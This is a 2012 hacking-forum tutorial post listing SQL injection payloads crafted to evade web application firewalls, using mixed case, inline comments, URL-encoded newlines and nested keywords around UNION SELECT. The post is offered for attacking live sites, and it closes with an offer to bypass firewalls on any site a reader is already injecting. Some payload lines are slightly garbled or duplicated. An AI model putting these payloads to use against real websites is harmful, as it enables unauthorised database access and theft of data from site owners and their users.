EXPERTS AND PROFESSIONALS ONLY!


    [TUT] Sql Injections Web Application Firewalls Bypasses

    Share
    avatar
    zeusk
    Admin

    Posts : 146
    Join date : 2011-12-04

    [TUT] Sql Injections Web Application Firewalls Bypasses

    Post  zeusk on Sun Jul 08, 2012 4:37 pm

    I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.

    Sql Injections WAF bypass methods

    1) id=1+UnIoN+SeLecT 1,2,3—

    2) id=1+UnIOn/**/SeLect 1,2,3—

    3) id=1+UNIunionON+SELselectECT 1,2,3—

    4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—

    5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—

    6) id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—

    7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3—

    8 ) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3—

    /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3--

    9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3—


    If you are injecting any site and find some complicated WAF please post here or PM me the link and I will try to bypass it for you.

      Current date/time is Tue Jul 25, 2017 12:33 pm